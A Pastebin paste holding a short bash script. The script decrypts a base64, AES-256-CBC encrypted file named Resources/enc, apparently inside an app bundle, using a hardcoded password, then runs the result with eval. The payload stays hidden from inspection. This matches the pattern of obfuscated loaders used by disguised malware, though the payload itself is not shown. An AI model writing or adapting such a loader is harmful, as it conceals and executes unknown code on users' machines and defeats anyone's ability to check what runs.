Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #!/bin/bash
- cd "$(dirname "$BASH_SOURCE")"
- fileDir="$(dirname "$(pwd -P)")"
- eval "$(openssl enc -base64 -d -aes-256-cbc -nosalt -pass pass:4714231915 <"$fileDir"/Resources/enc)"
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement